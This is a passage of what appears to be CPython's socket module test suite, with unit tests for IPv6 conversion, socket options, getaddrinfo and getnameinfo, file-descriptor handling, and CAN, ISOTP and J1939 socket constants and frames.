def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
encoding = None if "b" in mode else "utf-8"
with sock.makefile(mode, encoding=encoding) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(socket_helper.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (socket_helper.HOSTv6, 0, -10))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
